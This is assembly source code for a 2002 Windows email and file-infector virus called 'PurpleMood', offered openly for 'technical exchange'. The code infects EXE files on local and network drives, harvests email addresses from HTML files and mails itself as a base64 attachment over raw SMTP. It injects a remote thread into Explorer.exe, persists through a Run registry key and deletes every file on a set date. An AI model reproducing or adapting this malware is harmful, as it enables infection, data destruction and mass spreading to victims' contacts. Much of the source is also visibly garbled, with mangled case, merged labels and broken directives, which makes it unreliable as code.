*********************************************************** *************** Virus Name: PurpleMood (Purple Mood) Applicable Environment: WIN9X / WINNT / WIN2K / WINXP Writing Environment: WIN2K, MASM32V6 Introduction: 1. Infected local hard disk and network All EXE (GUI) files 2. Search all local mail addresses, send the virus as an attachment 3. Inject the running of the thread monitor in the Explorer process. 4. On the 15th, on the 15th. Delete all files of the hard disk. Completion Date: 2002/6/20 Edition: V1.0 Size: 6736 (Byte) Contact address: XpurpleMood@163.com Warning: The following procedure (Method) may have an aggressive, only for technical exchange. Users are at your own risk! If there is other uses, the profile does nothing to do with a repost, please keep integrity, thank you! *********************************************************** ****************. 386.Model Flat, StdCallOption Casemap: NoneInClude useful.inc
.Datahi DB "Hi", 0ppmm DB "PPMM, You NEED NO REASON TO Love Me!", 0
. CodeMain: MOV HOSTENTRY, OFFSET RET_ADDR JMP vStartRet_addr: Invoke MessageBox, Null, Offset PPMM, Offset Hi, 0 RET
Code segmentvstart:; virus starts here :) call startstart: pop ebx sub ebx, offset start
Call getkbase call getapiz
call PayLoad lea esi, [offset szEXEPath ebx] push MAX_PATH push esi push NULL mov eax, 12345678h_GetModuleFileNameA = dword ptr $ -4 call eax lea edi, [offset szFilePath ebx] push 50 push edi mov eax, 12345678h_GetSystemDirectoryA = dword ptr $ -4 call eax add eax, FNameSize mov SCRPathSize [ebx], eax lea eax, [offset szFileName ebx] push eax push edi mov eax, 12345678h_lstrcat = dword ptr $ -4 call eax push esi push edi mov eax, 12345678h_lstrcmpi = dword ptr $ -4 call eax or eax, eax jz StartInfect call CreatePE call rtInit call MakeSCRAliveRet2Host: push HostEntry [ebx] ret; stack case is HostEntry, execution returns to the normal inlet StartInfect: lea eax, [offset nGetProcAddress ebx]; Mutex Name Push EAX PUSH FALSE PUSH NULL MOV EAX, 12345678H_Createmutex = DWORD PTR $ -4 Call Eax Lea Eax, [Offset MonitorThread EBX] Push 0 Push 0 Push EBX; I Pass 0 First :( Push Eax Push 0 Push 0 MOV EAX, 12345678H_CREATTHREAD = DWORD PT $ -4 Call Eax Lea EAX, [Offset Pethread EBX] Push 0 Push 0 Push Ebx; I Pass 0 First :( Push Eax Push 0 Push 0 Call _CreateThread [EBX] Call MailThread; While (True)
************************************************************************** GETKBASE: MOV EDI, [ESP 4] and Edi, 0FFFFFFFFFFFFFF Word PTR [EDI] == Image_DOS_SIGNATURE MOV ESI, EDI Add ESI, [ESI 03CH] .IF DWORD PTR [ESI] == Image_NT_SIGNATURE .BREAK .Endif .Endif Sub EDI, 010000H .IF EDI < MIN_KERNEL_SEARCH_BASE; win9x mov edi, 0bff70000h; 0bff7000h = 9x "base .break .endif .endw mov hKernel32 [ebx], edi retGetAPIz: mov edx, edi; edx-> Kernel32_Base assume edx: ptr IMAGE_DOS_HEADER add edx, [edx] .e_lfanew assume edx: ptr IMAGE_NT_HEADERS mov edx, [edx] .OptionalHeader.DataDirectory.VirtualAddress add edx, hKernel32 [ebx] assume edx: ptr IMAGE_EXPORT_DIRECTORY mov ebp, [edx] .AddressOfNames add ebp, hKernel32 [ebx]; now ebp = Addr of RVAOFNAME [] XOR Eax, Eax; Eax AddressOfnames Index .repeat Push 14; LENTH OF GETPROC Address Pop ECX MOV EDI, [EBP] Add Edi, Hkernel32 [EBX] Lea ESI, [Offset NgetProcaddress EBX] REPZ CMPSB .IF ZERO? .Break .ndif ADD EBP, 4; Next RVA Inc Eax .until EAX == [edx] .NumberOfNames mov ebp, [edx] .AddressOfNameOrdinals add ebp, hKernel32 [ebx] movzx ecx, word ptr [ebp eax * 2] mov ebp, [edx] .AddressOfFunctions; get addr of the api add ebp, hKernel32 [EBX] MOV EAX, [EBP ECX * 4] Add Eax, Hkernel32 [EBX] MOV _GetProcaddress [EBX], EAX; Save GetProcaddressGetoApiz: Call @API_Table DB "LoadLibrarya", 0 DB "CreateThread", 0 dB "
CreateRemoteThread ", 0 DB" Winexec ", 0 dB" createmutexa ", 0 dB" openmutexa ", 0 dB" refirstfilea ", 0 DB" FindNextFilea ", 0 DB" FindClose ", 0 DB" CreateFilea " 0 DB "createfilemappinga", 0 DB "mapviewoffile", 0 dB "unmapViewoffile", 0 dB "setfilepointer", 0 DB "Writefile", 0 DB "CloseHandle", 0 DB "Virtualalloc", 0 DB "VirtualaLalkEx", 0 DB "WriteProcessMemory", 0 DB "VirtualFree", 0 DB "VirtualFreeex", 0 dB "lstrcmpi", 0 dB "lstrcpy", 0 dB "lstrcat", 0 dB "lstrlen", 0 DB "getFilesize", 0 dB " GetSystemDirectorya, 0 DB "getModuleFileNamea", 0 DB "Sleep", 0 DB "getSystemTime", 0 dB "deletefilea", 0 dB "openprocess", 0 @ API_Table: Pop Edi call @
api_destK_Apiz: dd offset _LoadLibraryA dd offset _CreateThread dd offset _CreateRemoteThread dd offset _WinExec dd offset _CreateMutex dd offset _OpenMutex dd offset _ReleaseMutex dd offset _FindFirstFile dd offset _FindNextFile dd offset _FindClose dd offset _CreateFile dd offset _CreateFileMapping dd offset _MapViewOfFile dd offset _UnmapViewOfFile dd offset _SetFilePointer dd offset _WriteFile dd offset _CloseHandle dd offset _VirtualAlloc dd offset _VirtualAllocEx dd offset _WriteProcessMemory dd offset _VirtualFree dd offset _VirtualFreeEx dd offset _lstrcmpi dd offset _lstrcpy dd offset _lstrcat dd offset _lstrlen dd offset _GetFileSize dd offset _GetSystemDirectoryA dd offset _GetModuleFileNameA dd offset _Sleep dd offset _GetSystemTime dd offset _DeleteFile dd offset _OpenProcessk_API_NUM = ($ -k_apiz) / 4 @ API_DEST: pop esi push K_API_NUM pop ecx xor ebp, ebpK_begin: push ecx push edi push hKernel32 [ebx] call _GetProcAddress [ebx] or eax, eax jz GA_Fail mov edx, [esi ebp] mov dword ptr [edx ebx], eax xor EAX, EAX REPNZ scaSB; looking for strings End flag 0, make EDI points to the next function name Add EBP, 4 Pop Ecx loop k_begin @pushsz "mpr.dll" call _loadlibrarya [ebx] or EAX, ESI, ESI, ESI, Eax; hModule of mpr.dllmpr_begin: @pushsz "WnetopENENUMA" Push ESI CALL _GETPROCADDRESS [EBX] MOV _WNETOPENENUM [EBX], Eax @pushsz "WneetenumResourcea"
push esi call _GetProcAddress [ebx] mov _WNetEnumResource [ebx], eax @pushsz "WNetCloseEnum" push esi call _GetProcAddress [ebx] mov _WNetCloseEnum [ebx], eaxGA_Fail: retPayLoad: call @ PL1SystemTime SYSTEMTIME <> @ PL1: mov esi, [esp ] MOV EAX, 12345678H_GETSYSTEMTIME = DWORD PTR $ -4 Call Eaxmovzx Eax, Word PTR [ESI 6]; SystemTime.wdaycmp AX, 14H; No. 15? JNZ PL_EXITKILL: PUSH FILE_ALL @Pushsz "D: / Test" call enumdirpl_exit: ret; ******************************************* *************; The Thread Begin TO ENUM All File in Disk and; Network, When IT Finds a PE file infect it!; ************ ***************************************** Pethread Proc MRELOC: DWORDPT_WORK: MOV EBX, MRELOC PUSH FILE_EXE @PUSHSZ "D: / TEST "Call Enumdir; Push Null; Call EnumNetwork Push 1000 * 60 * 60; Sleep An Hour :) Call _Sleep [EBX] JMP Short Pt_WorkPethread Endp
; Enumeration Network Neighborhood EnumNetWork PROC pNetResource: DWORD LOCAL hEnum: DWORD LOCAL Count: DWORD LOCAL BufferSize: DWORD pushad push 0FFFFFFFFh pop Count push 16 * 1024 pop BufferSize lea eax, hEnum push eax push pNetResource push 0 push RESOURCETYPE_DISK push RESOURCE_GLOBALNET mov eax, 12345678h_WNetOpenEnum = dword ptr $ -4 call eax or eax, eax jnz EN_Exit push PAGE_READWRITE push MEM_RESERVE or MEM_COMMIT push 16 * 1024 push 0 mov eax, 12345678h_VirtualAlloc = dword ptr $ -4 call eax or eax, eax jz short EN_Close mov pNetResource, eax lea eax, BufferSize push eax push pNetResource lea eax, Count push eax push hEnum mov eax, 12345678h_WNetEnumResource = dword ptr $ -4 call eax or eax, eax jnz short EN_Free mov ecx, Count mov edi, pNetResource assume edi: ptr NETRESOURCEAEN_Loop: push ECX MOV EAX, [EDI] .dwusage and Al, 2 .IF AL == 2 Push EDI call EnumNetWork .ELSE mov eax, [edi] .lpRemoteName push FILE_EXE push eax call EnumDir .ENDIF add edi, 20h; sizeof NETRESOURCE pop ecxloop EN_LoopEN_Free: push MEM_RELEASE push 0 push pNetResource mov eax, 12345678h_VirtualFree = dword ptr $ -4 call eaxEN_Close: Push Henum Mov Eax, 12345678H_WnetCloseenum = DWORD PTR $ -4 Call Eaxen_exit: Popad Ret 4enumNetwork Endp
************ InfectDisk ****************; traversed locally hard drive, from C to Z disk, call ENUMDIR traverses all EXE; ***************************************************** enumDisk PROC DirName: DWORD, FileType: DWORD .REPEAT push FileType push DirName call EnumDir mov eax, DirName inc byte ptr [eax] mov al, byte ptr [eax] .UNTIL al> "z" mov byte ptr [eax], " C "RET 8enumdisk endp; ************ * ************; Traversing Dirname, looking for filetype type files; ********** ******************** Enumdir Proc Dirname: DWORD, FILETYPE: DWORD LOCAL HSEARCH: DWORD LOCAL DIRORFILE [MAX_PATH]: DWORD PUSHAD PUSH DIRNAME LEA ESI, Dirorfile Push ESI mov eax, 12345678h_lstrcpy = dword ptr $ -4 call eax @pushsz "/*.*" push esi; DirorFile call _lstrcat [ebx] lea edi, [offset wfd ebx] push edi push esi mov eax, 12345678h_FindFirstFile = dword ptr $ -4 Call Eax Cmp Eax, INVALID_HANDLE_VALUE JZ Ed_EXIT MOV HSEARCH, EAX .REP Eat .IF BYTE PTR [WFD 44 EBX] == "JMP Short En_Next .Endif Push Dirname Push ESI CALL _LSTRCPY [EBX] @pushsz" / "Push ESI CALL _LSTRCAT [EBX] LEA EAX, [WFD 44 ebx] push eax push esi; DirorFile call _lstrcat [ebx] mov eax, dword ptr [wfd ebx] and eax, FILE_ATTRIBUTE_DIRECTORY .if eax == FILE_ATTRIBUTE_DIRECTORY push dword ptr FileType push esi call EnumDir .else;
File push dword ptr FileType push esi call AnFile .endifEN_NEXT: push edi push hSearch mov eax, 12345678h_FindNextFile = dword ptr $ -4 call eax .UNTIL eax == 0; FindNexeFile failED_Close: push hSearch mov eax, 12345678h_FindClose = dword ptr $ - 4 Call EAXED_EXIT: POPAD RET 8ENUMDIR ENDP; Analysis File Type, Portal Parameters are filename and want match type (EXE or HTM) Anfile Proc filename: DWORD, FILETYPE: DWORD PUSHADADAF_00: LODSB OR AL, Al Jnz AF_00 .IF FileType == file_all ALL PUSH FILENAME MOV EAX, 12345678H_DELETEFILE = DWORD PTR $ -4 Call Eax .elseif FileType == File_exe; Exe Mov Eax, [ESI-5] .IF EAX == "EXE." Push FileName Call Infectfile. Nendif .else; FileType = file_htmaf_01: Sub ESI, 2 LODSB CMP Al, "." JNZ AF_01 MOV EAX, [ESI-1] .IF EAX == "mth." Push FileName C ALL PARSE_HTM. Nendif.ndif Popad Ret 8anfile Endp
; Infected PE file InfectFile PROC FileName: DWORD LOCAL hFile: DWORD LOCAL hMapping: DWORD LOCAL pMapping: DWORD LOCAL ByteWrite: DWORD pushad push NULL push FILE_ATTRIBUTE_NORMAL push OPEN_EXISTING push NULL push FILE_SHARE_READ FILE_SHARE_WRITE push GENERIC_READ GENERIC_WRITE push FileName mov eax, 12345678h_CreateFile = dword ptr $ -4 call eax cmp eax, INVALID_HANDLE_VALUE jz IF_Exit mov hFile, eax push 0 push 0 push 0 push PAGE_READWRITE push NULL push hFile mov eax, 12345678h_CreateFileMapping = dword ptr $ -4 call eax or eax, eax jz IF_F3 mov hMapping, eax push 0 push 0 push 0 push FILE_MAP_READ FILE_MAP_WRITE push hMapping mov eax, 12345678h_MapViewOfFile = dword ptr $ -4 call eax or eax, eax jz IF_F2 mov pMapping, eax mov esi, eax assume esi: ptr IMAGE_DOS_HEADER .IF [esi] .e_magic ! = Image_dos_signature jmp if_f1 .endif. IF [ESI] .E_LFARLC! = 040H jmp if_f1 .endif add ESI, [ESI] .e_lfanew jmp IF_F1 .ENDIF .IF word ptr [esi] .OptionalHeader.Subsystem! = 2 jmp IF_F1 .ENDIF .IF word ptr [esi 1ah] == 0815h jmp IF_F1 .ENDIF mov eax, [esi] .OptionalHeader.AddressOfEntryPoint add eax , [ESI] .optionalHeader.ImageBase Mov Hostentry [EBX], EAX; save the original entrance; ************************************* **************************; judgment if there is enough space storage new festival; 28h = sizeof image_section_header; 18h = SizeOf Image_File_Header Signature; EDI will point to the New Festival;
*********************************************************** ************* MOVZX EAX, [ESI] .fileHeader.Numberofsections Mov ECX, 28H Mul ECX Lea EDI, [ESI] Sub EDI, PMApping Add Eax, EDI Add Eax, 18h Movzx EDI, [ESI] .fileHeader.SizeOfoptionalheader Add Eax, EDI MOV EDI, EAX Add Edi, PMApping; I Forgot this first add Eax, 28h .if Eax> [ESI] .OptionalHeader.sizeOfheaders jmp if_f1 .ndif; ****** **************************; space allows, ^ 0 ^, start inserting new sections and populates each Field; ESI points to the last section of the original file, use it to fill some fields in the new season; ************************************* *********** inc [esi] .FileHeader.NumberOfSections assume edi: ptr IMAGE_SECTION_HEADER mov dword ptr [edi], 00736A78h; "xjs" push [esi] .OptionalHeader.SizeOfImage pop [edi] .VirtualAddress MOV EAX, Offset Vend-Offset VStart Mov [EDI] .Misc.Virtualsize, EAX MOV ECX, [ESI] .optionalHeader.FileAlignment Div ECX Inc Eax Mul ECX MOV [EDI] .SizeOfrawData, EAX LEA EAX, [EDI-28H 14h]; PointertorawData Mov Eax, [EAX ] Lea ECX, [EDI-28H 10H]; SizeOfrawData Mov ECX, [ECX] Add Eax, ECX MOV [EDI] .pointertorawData, EAX MOV [EDI] .Characteristics, 0e0000020H; Readable can be writable; *** *********************************************************** **********; Update SizeOfImage, AddressofEntryPoint, make the New Festival can be loaded correctly and execute first; ********************** ************************************************ MOV EAX, [EDI] .Misc.Virtualsize MOV ecx, [esi] .OptionalHeader.SectionAlignment div ecx inc eax mul ecx add eax, [esi] .OptionalHeader.SizeOfImage mov [esi] .OptionalHeader.SizeOfImage, eax mov eax, [edi] .VirtualAddress mov [esi] .OptionalHeader. AddressofentryPoint, Eax Mov Word PTR [ESI 1AH], 0815H;
Write infection marker push file_begin push 0 push [edi] .pointertorawdata push hfile Mov Eax, 12345678h_setfilepointer = DWORD PTR $ -4 Call EAX; ******************************* ********************************; set the file pointer to the end Write the code starting from VStart, the size is aligned; ****************************************** ************************** PUSH 0 Lea Eax, Bytewrite Push Eax Push [EDI] .sizeOfrawData Lea Eax, [Offset VStart EBX ] push eax push hFile mov eax, 12345678h_WriteFile = dword ptr $ -4 call eaxIF_F1: push pMapping mov eax, 12345678h_UnmapViewOfFile = dword ptr $ -4 call eaxIF_F2: push hMapping call _CloseHandle [ebx] IF_F3: push hFile call _CloseHandle [ebx] IF_Exit : POPAD RET 4INFECTFILE ENDP; ******************************************************************************************* ****; from the local, network * .htm * get the email address. ***************************************** *************************** MAILTHREAD: CALL Mailinitmt_Work: Push File_htm @pushsz "C:" Call Enumdisk Push 1000 * 60 * 60 * 24; SLEE PA day :) call _sleep [ebx] jmp short mt_work; ***************************************************** *************** * MUTATE Virus to base64 only overce; ********************** ********************************************* Mailinit Proc Local Hfile: DWORD LOCAL HMAPPING: DWORD LOCAL PMAPPING: DWORD PUSHAD XOR EDI, EDI PUSH EDI PUSH FILE_ATTRIBUTE_NORMAL PUSH OPEN_EXISTING PUSH EDI PUSH File_Share_read Push Generic_Read Lea Eax, [Offset SzFilePath
ebx] push eax call _CreateFile [ebx] mov hFile, eax push edi push edi push edi push PAGE_READONLY push edi push eax call _CreateFileMapping [ebx] mov hMapping, eax push edi push edi push edi push FILE_MAP_READ push eax call _MapViewOfFile [ebx] mov pMapping, eax push PAGE_READWRITE push MEM_RESERVE or MEM_COMMIT push SIZEOF_VIRUS_FILE * 2 push edi call _VirtualAlloc [ebx] mov Base64_Encoded_Data [ebx], eax mov esi, pMapping mov edi, Base64_Encoded_Data [ebx] call EncodeBase64 @pushsz "WSOCK32.DLL" call _LoadLibraryA [ ebx] xchg eax, edi; hSockDll @pushsz "WSAStartup" push edi call _GetProcAddress [ebx] lea esi, [offset WSA_Data ebx] push esi push 0202h; !!! warning 2.2 call eax @pushsz "socket" push edi call _GetProcAddress [EBX] MOV [Offset _socket EBX], EAX @pushsz "gethostbyname" push edi call _getprocaddress [ebx] @ Pushsz "Pact518.hit.edu.cn" Call ESI ESI, [EAX 12] Lodsd Push [EAX] POP [Offset Servip EBX] @pushsz "Connect" Push Edi Call _GetProcadDress [EBX] MOV [Offset _Connect EBX ], eax @ pushsz "send" push edi call _GetProcAddress [ebx] mov [offset _send ebx], eax @ pushsz "closesocket" push edi call _GetProcAddress [ebx] mov [offset _closecsoket ebx], eaxMI_Close3: push pMappingcall _UnmapViewOfFile [ EBX] mi_close2: push hmappingcall _closehandle [ebx] mi_close: push hfilecall _closehandle [ebx] mi_exit: popad retMailinit Endp; ************************************ ********; ESI <
- Buffer with data to encode; EDI <- Destination Buffer; ****************************************** EncodeBase64 Proc LOCAL BASE64_lines: DWORD xor ecx, ecx mov BASE64_lines, ecx cldBASE64encode_loop: cmp ecx, SIZEOF_VIRUS_FILE jae BASE64__exit xor edx, edx mov dh, byte ptr [esi ecx] inc ecx cmp ecx, SIZEOF_VIRUS_FILE jae BASE64__00 mov dl, byte ptr [esi ecx ] BASE64__00: inc ecx shl edx, 08h cmp ecx, SIZEOF_VIRUS_FILE jae BASE64__01 mov dl, byte ptr [esi ecx] BASE64__01: inc ecx mov eax, edx and eax, 00fc0000h shr eax, 12h mov al, byte ptr [eax offset Base64DecodeTable ebx] stosb mov eax, edx and eax, 0003f000h shr eax, 0Ch mov al, byte ptr [eax offset Base64DecodeTable ebx] stosb mov eax, edx and eax, 00000fc0h shr eax, 06h mov al, byte ptr [eax Offset Base64Decodetable EBX] Stosb Mov Eax, Edx and Eax, 0000003FH MOV Al, Byte PTR [EAX Offset Base64Decodetable EBX] Stosb Cmp ECX, SIZEOF_VIRUS_FILE JBE BA SE64__02 mov byte ptr [edi-00000001h], "=" BASE64__02: cmp ecx, SIZEOF_VIRUS_FILE 01h jbe BASE64__03 mov byte ptr [edi-00000002h], "=" inc BASE64_lines cmp BASE64_lines, 00000013h jne BASE64encode_loop mov ax, 0A0Dh stosw mov BASE64_lines , 00000000HBase64__03: JMP Base64Encode_LoopBase64__Exit: MOV AX, 0A0DH Stosw RetencodeBase64 Endp; ********************************************************* *********; Send a mail function; 1. Connect the SMTP Server; 2. Send protocol information, send the base64 encoded attachment, send the remaining data; Warning: Send data length; ****** ******************************************************************** Sendmail Procpushad Push Null Push Sock_Stream Push AF_Inet MOV EAX 12345678H_Socket =
dword ptr $ -4call eax mov VSocket [ebx], eaxpush sizeof (sockaddr); Size of connect strucure = 16call @ SMTP1; Connect structuredw AF_INET; Familydb 0,25; Port number, avoid htons:) ServIP dd 0; in_addr of serverdb 8 dup (0); Unused @ SMTP1: push [offset VSocket ebx] mov eax, 12345678h_connect = dword ptr $ -4call eaxlea eax, [offset SM_I ebx] push eaxmov eax, 12345678h_lstrlen = dword ptr $ - 4call eaxpush NULLpush eaxcall SM_I_EndSM_I: HelloServer db "HELO cx", 0dh, 0ah db "MAIL FROM: <" TempMailTo db 128 dup (0) SM_I_End: push [offset VSocket ebx] call _send [ebx] push NULLpush SM_II_End - SM_IIcall SM_II_EndSM_II: db "> ", 0DH, 0AHRCPTTO DB" RCPT TO:
Bufferpush [offset VSocket ebx] call _send [ebx] push NULLpush SM_DR_Lencall SM_DRMailDataRemain db "--WC_MAIL_PaRt_BoUnDaRy_05151998 -" ".", 0dh, 0ah db 0dh, 0ah,, 0dh, 0ah, "QUIT", 0dh, 0ahSM_DR_Len = $ - MailDataRemainSM_DR: push [offset VSocket ebx] call _send [ebx] push [offset VSocket ebx] mov eax, 12345678h_closecsoket = dword ptr $ -4call eaxpopadretSendMail ENDP; analysis mailFileName (* htm *.), looking Mail_Addr.Parse_HTM PROC FileName : DWORD LOCAL HFILE: DWORD LOCAL HMAPPING: DWORD LOCAL SAFEFSIZE: DWORD
pushadpush 0push FILE_ATTRIBUTE_NORMALpush OPEN_EXISTINGpush 0push FILE_SHARE_READpush GENERIC_READpush FileNamecall _CreateFile [ebx] or eax, eaxjz PH_Exitmov hFile, eaxxor eax, eaxpush eaxpush eaxpush eaxpush PAGE_READONLYpush eaxpush hFilecall _CreateFileMapping [ebx] or eax, eaxjz PH_Closemov hMapping, eaxxor eax, eaxpush eaxpush eaxpush eaxpush FILE_MAP_READpush hMappingcall _MapViewOfFile [ebx] or eax, eaxjz PH_Close2xchg eax, esi; esi = pMappingpush 0push hFile mov eax, 12345678h_GetFileSize = dword ptr $ -4 call eaxsub eax, 16; For securityadd eax, esimov SafeFSize, eax; esi must be below SafeFSize .while esi
**************************; DATA Used by sendmail; **************** ************ WSA_DATA WSADATA <> vsocket DD 0_send DD 0Base64_Encoded_Data DD 0Base64DecodETable EQU $ DB "A", "B", "C", "D", "E", "F", "G", "h", "i", "j" DB "k", "l", "m", "n", "o", "p", "q", "r", "s "," T "DB" U "," V "," W "," X "," Y "," Z "," A "," B "," C "," D "DB" E ", "f", "g", "h", "i", "j", "k", "l", "m", "n" DB "o", "p", "q", "r "S", "T", "u", "v", "w", "x" DB "Y", "Z", "0", "1", "2", "3", "4", "5", "6", "7" DB "8", "9", " ", "/" sizeofbase64decodetable EQU $ -Base64Decodetable; ******** Createpe **** ****************** CreatePE PROC LOCAL ByteWrite: DWORD pushad lea eax, [offset szFilePath ebx] push NULL push FILE_ATTRIBUTE_NORMAL push CREATE_NEW push NULL push FILE_SHARE_READ FILE_SHARE_WRITE push GENERIC_READ GENERIC_WRITE Push eax call _createfile [EBX] or Eax, EAX JZ CT_EXIT XCHG EAX, ESI Lea Edi, Bytewrite Push 0 Push EDI PUSH 200H; File Header <200h & FileAlIAgment = 200h Lea Eax, [Offset MDosstub EB x] Push Eax Push ESI; ESI = Hfile Call_WriteFile [EBX]; Write Dosstub, Ntheader, SectionHeader Push 0 Push Edi Push Vraw_size Lea EAX, [Offset vStart
EBX] PUSH EAX PUSH ESI CALL _WRITEFILE [EBX]; Write Code and Import Tatle Push ESI CALL _CLOSHANDLE [EBX] CT_EXIT: POPAD RETCREATEPE ENDP; ************* MONITORTHREAD ******* *****************; ENUM All active processes, insert RTTHREADSTART-> RTTHREADEND code, monitor the operation and registry of interestMood.scr; Run item.; *************************************************** ************* MonitorThread PROC MReloc: DWORD mov ebx, MReloc @ pushsz "PSAPI" call _LoadLibraryA [ebx] xchg eax, esi @ pushsz "EnumProcesses" push esicall _GetProcAddress [ebx] mov _EnumProcesses [ ebx], eax @ pushsz "EnumProcessModules" push esicall _GetProcAddress [ebx] mov _EnumProcessModules [ebx], eax @ pushsz "GetModuleBaseNameA" push esicall _GetProcAddress [ebx] mov _GetModuleBaseNameA [ebx], eaxlea esi, [offset procz ebx] lea edi , [offset tmp ebx] push edipush 128push esimov eax, 12345678h_EnumProcesses = dword ptr $ -4call eax; enumerate all running processesdec eaxjne MT_Exitadd esi, 4; esi-> ProcessIDs [128] p_search: lodsd; get PIDtest eax, eaxje MT_Exitcall AnalyseProcess; and try to infect itjmp p_searchMT_Exit: ret 4MonitorThread ENDPAnalyseProcess Proc pushadpush eax; process idpush 0push PROCESS_VM_OPERATION or PROCESS_CREATE_THREAD or PROCESS_VM_WRITE or PROCESS_VM_READ or PROCESS_QUERY_INFORMATIONmov eax, 12345678h_OpenProcess = dword ptr $ -4call eax; PID -> handleor eax, eaxjz AP_Exitmov hProcess [ebx ], eaxlea esi, [offset modz ebx] lea ecx, [offset tmp ebx] push ecxpush 4push esipush hProcess [ebx] mov eax, 12345678h_EnumProcessModules = dword ptr $ -4call eax; get first (main) moduledec eaxjne AP_Exitlodsdlea edi, [offset mod_name
ebx] push MAX_PATHpush edipush eaxpush hProcess [ebx] mov eax, 12345678h_GetModuleBaseNameA = dword ptr $ -4call eax; get its nametest eax, eaxje AP_Exit @pushsz "Explorer.exe" push edi call _lstrcmpi [ebx] jnz AP_Exitlea esi, [offset rtThreadStart ebx] mov edi, rtThreadEnd - rtThreadStart push PAGE_READWRITEpush MEM_RESERVE or MEM_COMMITpush edipush 0push 12345678hhProcess = dword ptr $ -4mov eax, 12345678h_VirtualAllocEx = dword ptr $ -4call eax; aloc there a memorytest eax, eaxje AP_Exitxchg eax, ebppush 0push edipush esipush ebppush dword ptr [ebx offset hProcess] mov eax, 12345678h_WriteProcessMemory = dword ptr $ -4call eax; write there our codedec eaxjne AP_FreeMemxor edx, edxpush edxpush edxpush edxpush ebppush edxpush edxpush dword ptr hProcess [ebx] mov eax, 12345678h_CreateRemoteThread = dword ptr $ -4 Call Eax; Run Remote Thread! JMP AP_EXIT; Important, I Forgot Firstap_Freemem: Push Mem_releasePush 0push EBPPUSH DWORD PTR HPROCESS [EBX] MOV EAX, 12345678H_Virtualfre eEx = dword ptr $ -4call eax; free memoryAP_Exit: popad retAnalyseProcess EndPprocz dd 128 dup dd modz dd mod_name db MAX_PATH dup tmp dd rtThreadStart: call rtStartrtStart: pop ebx sub ebx, offset rtStart call rtInitrtWork (?)?? (?)? : call MakeSCRAlive push 1000 * 60 mov eax, 12345678h_Sleep = dword ptr $ - 4 call eax jmp short rtWorkrtInit: @pushsz "shlwapi.dll" mov eax, 12345678h_LoadLibraryA = dword ptr $ - 4 call eax @pushsz "SHSetValueA" push eax mov Eax, 12345678H_GetProcaddress =
dword ptr $ - 4 call eax mov _SHSetValueA [ebx], eax retMakeSCRAlive: call @ RT1nGetProcAddress db "GetProcAddress", 0 @ RT1: push FALSE push 1 mov eax, 12345678h_OpenMutex = dword ptr $ - 4 call eax xchg esi, eax .if esi == NULL jmp RunSCR .else push esi mov eax, 12345678h_ReleaseMutex = dword ptr $ - 4 call eax push esi mov eax, 12345678h_CloseHandle = dword ptr $ - 4 call eax jmp RegistSCR .endifRunSCR: push SW_HIDE call @ RT2szFilePath db 50 dup ( 0) @ RT2: mov eax, 12345678h_WinExec = dword ptr $ - 4 call eaxRegistSCR: lea eax, [offset szFilePath ebx] push 12345678hSCRPathSize = dword ptr $ -4 push eaxpush REG_SZ @pushsz "PurpleMood" @pushsz "Software / Microsoft / Windows / currentversion / run "push hkey_local_machine MOV EAX, 12345679H_SHSetValuea = DWORD PTR $ -4 Call Eax; Eax = ShSetValuea Addr RetthRTHRTHREDENDEND:; ************ * Virus Data **************************************** SIGNATURE DB "Purple mood, your forever expectation", 0Hostentry DD 0hkernel32 DD 0SZEXEPATH DB MAX_PATH DUP (0) SZFILENAME DB "/PURPLEMOOD.SCR" /PURPLEMOOD.SCR "/ PNAMESIZE = $ - SZFILENAMEWFD WIN32_FIND_DATA <>; **************** PE DATA ******* ********************* VIMPORTS: DD Offset Kernel32_Pointers @ DD -1, -1 DD Offset Kernel32_name @viat: DD Offset Kernel32_relocated @ DB 14 DUP (0) KERNEL32_POINTERS DD OFFSET KERNEL32_BEEP @, 0 kernel32_relocated DD Offset Kernel32_Beep @
??, 0Kernel32_Beep db,, "MessageBoxA", 0Kernel32_Name db "User32.dll", 0MDosStub: db 4Dh, 5Ah, 90h, 00,03,00, 00, 00, 04, 00, 00,00,0FFh, 0FFh, 00, 00 dB 0B8H, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 40H, 00, 00, 00 DB 50h, 45h, 00,00MFileHeader: Machine dw 14Ch NumberOfSections dw 1 TimeDateStamp dd 3cbe5cc2h PointerToSymbolTable dd 0 NumberOfSymbols dd 0 SizeOfOptionalHeader dw 0e0h Characteristics dw 10fhMIMAGE_OPTIONAL_HEADER32: Magic dw 10bh MajorLinkerVersion db 5 MinorLinkerVersion db 12 SizeOfCode dd VRAW_SIZE SizeOfInitializedData dd 0 SizeOfUninitializedData dd 0 AddressOfEntryPoint dd 1000H BaseOfcode DD 1000H BaseofData DD 3000H ImageBase DD 400000H SectionAlignment DD 1000H FileAlignment dd 200h MajorOperatingSystemVersion dw 4 MinorOperatingSystemVersion dw 0 MajorImageVersion dw 0 MinorImageVersion dw 0 MajorSubsystemVersion dw 4 MinorSubsystemVersion dw 0 Win32VersionValue dd 0 SizeOfImage dd 3000h; need to change st SizeOfHeaders dd 200h CheckSum dd 0 Subsystem dw 2;
